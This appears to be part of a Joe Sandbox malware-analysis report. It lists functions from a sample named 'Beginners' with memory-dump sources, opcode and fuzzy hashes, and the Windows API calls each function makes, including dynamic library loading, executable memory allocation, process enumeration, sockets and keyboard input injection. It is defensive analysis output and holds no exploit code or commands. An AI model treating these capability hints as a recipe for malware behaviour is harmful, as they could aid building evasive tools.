                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                          • API String ID: 2574300362-192647395
                                          • Opcode ID: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
                                          • Instruction ID: 33704cd920a25ec8e02df7dc29d46fff8d7c03af912d1f077b2b0eb58a609071
                                          • Opcode Fuzzy Hash: d6abf609164b45a45822fcd7b0de88955b243b290fa0d8222552130f1987978c
                                          • Instruction Fuzzy Hash: 26D01278520B128FE7215F32CC0861B76D4AF09756B11882DD586D2561D770D4C0CA50
                                          APIs
                                          • LoadLibraryA.KERNEL32(kernel32.dll,00000001,001293DE,?,00140980), ref: 001297D8
                                          • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 001297EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: AddressLibraryLoadProc
                                          • String ID: GetModuleHandleExW$kernel32.dll
                                          • API String ID: 2574300362-199464113
                                          • Opcode ID: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
                                          • Instruction ID: 9164d7e114355636c5d1df4527f1010b66cd3c7b4dca029600f82d30b984bb66
                                          • Opcode Fuzzy Hash: bc0f84dd816fc55ca602efd0552a70f2990cbffcb3f8f1c11329813629a51c85
                                          • Instruction Fuzzy Hash: 63D017B45207238FD7219F36EC88606B6E4AF09791F11C82AD58AE2660EB74C8D0CA11
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
                                          • Instruction ID: e94c3016d6cad9b81e19c04e0dc83abeb7e1e2cabec4c8796211238997bda26f
                                          • Opcode Fuzzy Hash: 44f9411183d5d955bbf87ab750c416ca8abc8ff9dc0e46cb14aa9492f3f984ea
                                          • Instruction Fuzzy Hash: 63C17E74A04216EFCB14DF98C884EAEB7B5FF48714B118598F885EB291DB71ED81CB90
                                          APIs
                                          • CharLowerBuffW.USER32(?,?), ref: 0012E7A7
                                          • CharLowerBuffW.USER32(?,?), ref: 0012E7EA
                                            • Part of subcall function 0012DE8E: CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0012DEAE
                                          • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 0012E9EA
                                          • _memmove.LIBCMT ref: 0012E9FD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: BuffCharLower$AllocVirtual_memmove
                                          • String ID:
                                          • API String ID: 3659485706-0
                                          • Opcode ID: af302f69641ac57607560820ccb702ce59a004d6c93abb0bb7a462449c303f4c
                                          • Instruction ID: 683be9da2a3bf69c9b05b2aee75bb682e8d120d7efff6cef73416bc2e8257df0
                                          • Opcode Fuzzy Hash: af302f69641ac57607560820ccb702ce59a004d6c93abb0bb7a462449c303f4c
                                          • Instruction Fuzzy Hash: 10C17B716083118FC714DF28D480AAABBE4FF89714F14896EF8999B352D731E946CF92
                                          APIs
                                          • CoInitialize.OLE32(00000000), ref: 001287AD
                                          • CoUninitialize.OLE32 ref: 001287B8
                                            • Part of subcall function 0013DF09: CoCreateInstance.OLE32(00000018,00000000,00000005,00000028,?,?,?,?,?,00000000,00000000,00000000,?,00128A0E,?,00000000), ref: 0013DF71
                                          • VariantInit.OLEAUT32(?), ref: 001287C3
                                          • VariantClear.OLEAUT32(?), ref: 00128A94
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                          • String ID:
                                          • API String ID: 780911581-0
                                          • Opcode ID: 19d0a26a417dc1de05d37a55c650825716a3d84d1d6ea995165287d4a1b71809
                                          • Instruction ID: 95e106feca787ba79edf994682ee6c3467a94da002d14d9f6927714192a8fd55
                                          • Opcode Fuzzy Hash: 19d0a26a417dc1de05d37a55c650825716a3d84d1d6ea995165287d4a1b71809
                                          • Instruction Fuzzy Hash: 75A158752047119FDB14EF14D481BAAB7E4BF88314F148849F9969B3A2CB30ED50CB96
                                          APIs
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108308
                                          • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108320
                                          • CLSIDFromProgID.OLE32(?,?,00000000,00140988,000000FF,?,00000000,00000800,00000000,?,00143C4C,?), ref: 00108345
                                          • _memcmp.LIBCMT ref: 00108366
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: FromProg$FreeTask_memcmp
                                          • String ID:
                                          • API String ID: 314563124-0
                                          • Opcode ID: 9c65658d7aae294e53a592f78440743af8ca382010e70f22a4605a3030f352d7
                                          • Instruction ID: 20fa58c4cbb02046e10edd6595707e55c17c23ab4263e5b53b988eb08fcd28f3
                                          • Opcode Fuzzy Hash: 9c65658d7aae294e53a592f78440743af8ca382010e70f22a4605a3030f352d7
                                          • Instruction Fuzzy Hash: 46813975A00109EFCB04DFD4C984EEEB7B9FF89315F204558E556AB2A0DB71AE06CB60
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Variant$AllocClearCopyInitString
                                          • String ID:
                                          • API String ID: 2808897238-0
                                          • Opcode ID: 4115971090b36a41824b35bb221463d04b8001def0260172531b0422c0d0b587
                                          • Instruction ID: 41eff9fb4b01e186ffdaf5261538e55a6ea2d949c19873126d468c251bfc6bdb
                                          • Opcode Fuzzy Hash: 4115971090b36a41824b35bb221463d04b8001def0260172531b0422c0d0b587
                                          • Instruction Fuzzy Hash: 02519630E087059AD724AF79D895A7DB3E5AF55310B20881FE5C7C76E2EBB1B8808B15
                                          APIs
                                          • CreateToolhelp32Snapshot.KERNEL32 ref: 0012F526
                                          • Process32FirstW.KERNEL32(00000000,?), ref: 0012F534
                                            • Part of subcall function 000C1A36: _memmove.LIBCMT ref: 000C1A77
                                          • Process32NextW.KERNEL32(00000000,?), ref: 0012F5F4
                                          • CloseHandle.KERNEL32(00000000,?,?,?), ref: 0012F603
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
                                          • String ID:
                                          • API String ID: 2576544623-0
                                          • Opcode ID: 2be7604fa4ab266b075b9dfd496ffeb4abd7e5e2e21b3eae6ee4c350abadb069
                                          • Instruction ID: 62dfc59d2ff7d7d2a17bac37d29a3fe0825dd7caf68a81d90e235dbf9ad4555c
                                          • Opcode Fuzzy Hash: 2be7604fa4ab266b075b9dfd496ffeb4abd7e5e2e21b3eae6ee4c350abadb069
                                          • Instruction Fuzzy Hash: D3514D715043119FD310EF24D886FAFB7E8EF99710F40492DF595972A2EB709A05CB92
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                          • String ID:
                                          • API String ID: 2782032738-0
                                          • Opcode ID: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                          • Instruction ID: 751c2c110ab772d291df6090b1e87a96a5d5f07b86c74e424d2849ae06327b6c
                                          • Opcode Fuzzy Hash: a7c34a093fdd5ab58b6ffc98053f9d5ae49c5acda348f4cccab4e545be81f79d
                                          • Instruction Fuzzy Hash: 3D41B531600706ABDF688FAEC8909AFB7E5AF41360B24817FE855C7740D7709D418B65
                                          APIs
                                          • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 0010A68A
                                          • __itow.LIBCMT ref: 0010A6BB
                                            • Part of subcall function 0010A90B: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 0010A976
                                          • SendMessageW.USER32(?,0000110A,00000001,?), ref: 0010A724
                                          • __itow.LIBCMT ref: 0010A77B
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow
                                          • String ID:
                                          • API String ID: 3379773720-0
                                          • Opcode ID: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
                                          • Instruction ID: 67efd406c4f6a83e91122808bafcfc3f185fa5bff3afcb5e5e43517cc29dc184
                                          • Opcode Fuzzy Hash: 63a6ae8f661a4e08b4b94776fc84482aab8b6770dce478fc523523da6fa375de
                                          • Instruction Fuzzy Hash: 2141BE75A00308AFDF11EF54C846FEE7BB9EF49750F404029F945A32D2DBB19A44CAA2
                                          APIs
                                          • socket.WSOCK32(00000002,00000002,00000011), ref: 001270BC
                                          • WSAGetLastError.WSOCK32(00000000), ref: 001270CC
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00127130
                                          • WSAGetLastError.WSOCK32(00000000), ref: 0012713C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ErrorLast$__itow__swprintfsocket
                                          • String ID:
                                          • API String ID: 2214342067-0
                                          • Opcode ID: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
                                          • Instruction ID: bb2f0b42d445f1b6fa7902afcf577178db26a73108823e8bc11482a655208c82
                                          • Opcode Fuzzy Hash: 3c4dc5648e3847310fb2db21ad08384313ef8acf4637deb886c1719b9713009c
                                          • Instruction Fuzzy Hash: F641AE757402106FEB25AF24EC86FAA77A4DF04B10F048458FA59AB3D3DB749E108B95
                                          APIs
                                          • #16.WSOCK32(?,?,00000000,00000000,00000000,00000000,?,?,00000000,00140980), ref: 00126B92
                                          • _strlen.LIBCMT ref: 00126BC4
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _strlen
                                          • String ID:
                                          • API String ID: 4218353326-0
                                          • Opcode ID: 06f91d89eb902170a1f5e9c8226a153c03b87ec37d817f98f1da88eb3003d64f
                                          • Instruction ID: c19ba70fc9ab1387e4826e8dc71d13c0462ba52b5c86d59f1049a628634aa3e1
                                          • Opcode Fuzzy Hash: 06f91d89eb902170a1f5e9c8226a153c03b87ec37d817f98f1da88eb3003d64f
                                          • Instruction Fuzzy Hash: 7B41A071A00119ABCB14FB64EC95FEEB3A9EF54310F148159F91A972D3DB30AE61C790
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00138F03
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID:
                                          • API String ID: 634782764-0
                                          • Opcode ID: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
                                          • Instruction ID: 0478ef645973a8fe4a0eea5ae4e8791f3bcec73fb21b40c887a1da637655e365
                                          • Opcode Fuzzy Hash: b41806f7595c8b4cbf921f0c3135fb22b2529c261efae50e32ebbe6f9055a553
                                          • Instruction Fuzzy Hash: 6331B034614318EFEF259B18CC49FAC37AAEB0A320F244511FA15D65E1DF75E990CB51
                                          APIs
                                          • ClientToScreen.USER32(?,?), ref: 0013B1D2
                                          • GetWindowRect.USER32(?,?), ref: 0013B248
                                          • PtInRect.USER32(?,?,0013C6BC), ref: 0013B258
                                          • MessageBeep.USER32(00000000), ref: 0013B2C9
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Rect$BeepClientMessageScreenWindow
                                          • String ID:
                                          • API String ID: 1352109105-0
                                          • Opcode ID: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
                                          • Instruction ID: 9f32ad9d3c72229de0c320c7d091ec38399a4459067852d2b91526dc02b64257
                                          • Opcode Fuzzy Hash: 2361febdb855e311f2377370efda546d4fbe6cc60563b9760420730ff58d4a58
                                          • Instruction Fuzzy Hash: 90418130A08115DFDF11CF98C8C4B9E77F5FF49350F1842A9EA189B265E730A981CB51
                                          APIs
                                          • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00111326
                                          • SetKeyboardState.USER32(00000080,?,00000001), ref: 00111342
                                          • PostMessageW.USER32(00000000,00000102,00000001,00000001), ref: 001113A8
                                          • SendInput.USER32(00000001,00000000,0000001C,00000000,?,00000001), ref: 001113FA
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
                                          • Instruction ID: d9afe39f2e9bfb9a3d3bf2917b4873e2265f2d4bd92487a98c77bb3f9b28b5b5
                                          • Opcode Fuzzy Hash: 6776eacf4a1a815aeeccc5fce75d61076035ff249928277ed41e86bea82dd3c3
                                          • Instruction Fuzzy Hash: AA313930D54618BEFF3D86258805BFDFBA6BB49330F04422AE6A0529D9D3748DC19B55
                                          APIs
                                          • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00111465
                                          • SetKeyboardState.USER32(00000080,?,00008000), ref: 00111481
                                          • PostMessageW.USER32(00000000,00000101,00000000), ref: 001114E0
                                          • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00111532
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: KeyboardState$InputMessagePostSend
                                          • String ID:
                                          • API String ID: 432972143-0
                                          • Opcode ID: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
                                          • Instruction ID: 5bda2fdfa5c9e1c521c215a883071ebf1f47f4f7b4eb375ddeff77185c12a83f
                                          • Opcode Fuzzy Hash: 5762d67479d7fc42cb69407e0fe92a3087d48077ed58c88d04b094767d923146
                                          • Instruction Fuzzy Hash: 12315C309442187EFF3D8A659C047FEFB66AB99710F48433AE681529D1C37889D19BA1
                                          APIs
                                          • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 000E642B
                                          • __isleadbyte_l.LIBCMT ref: 000E6459
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E6487
                                          • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,00000000,00000000,?,00000000,00000000,?,?), ref: 000E64BD
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                          • String ID:
                                          • API String ID: 3058430110-0
                                          • Opcode ID: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
                                          • Instruction ID: 1306a2fa2f0568efa50c0e44b8d190d4213e6f44b29706275b37529f2204fc56
                                          • Opcode Fuzzy Hash: 798c594cd254104b984307a2dac88b9982634a264f4e4f87d522d9faba7659c5
                                          • Instruction Fuzzy Hash: 6C31F2B1600296AFDB218F66DC44BAB7FE5FF51390F154029F824A71E1DB32E990D750
                                          APIs
                                          • GetForegroundWindow.USER32 ref: 0013553F
                                            • Part of subcall function 00113B34: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00113B4E
                                            • Part of subcall function 00113B34: GetCurrentThreadId.KERNEL32 ref: 00113B55
                                            • Part of subcall function 00113B34: AttachThreadInput.USER32(00000000,?,001155C0), ref: 00113B5C
                                          • GetCaretPos.USER32(?), ref: 00135550
                                          • ClientToScreen.USER32(00000000,?), ref: 0013558B
                                          • GetForegroundWindow.USER32 ref: 00135591
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                           • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                           • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                          • String ID:
                                          • API String ID: 2759813231-0
                                          • Opcode ID: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
                                          • Instruction ID: 0660e802605a99f4eed2f4eeb13b12d8b13fd66fc44f3923213df513d553b157
                                          • Opcode Fuzzy Hash: 1d060d487ecbf3be8fdd01ca3dbd61b66fd01f033f2c4f5c93e994fa2a44e80a
                                          • Instruction Fuzzy Hash: 3A312B71D00108AFDB00EFA5D8859EEB7F9EF98704F10446AE915E7252EB75AF40CBA0
                                          APIs
                                            • Part of subcall function 000B29E2: GetWindowLongW.USER32(?,000000EB), ref: 000B29F3
                                          • GetCursorPos.USER32(?), ref: 0013CB7A
                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,000EBCEC,?,?,?,?,?), ref: 0013CB8F
                                          • GetCursorPos.USER32(?), ref: 0013CBDC
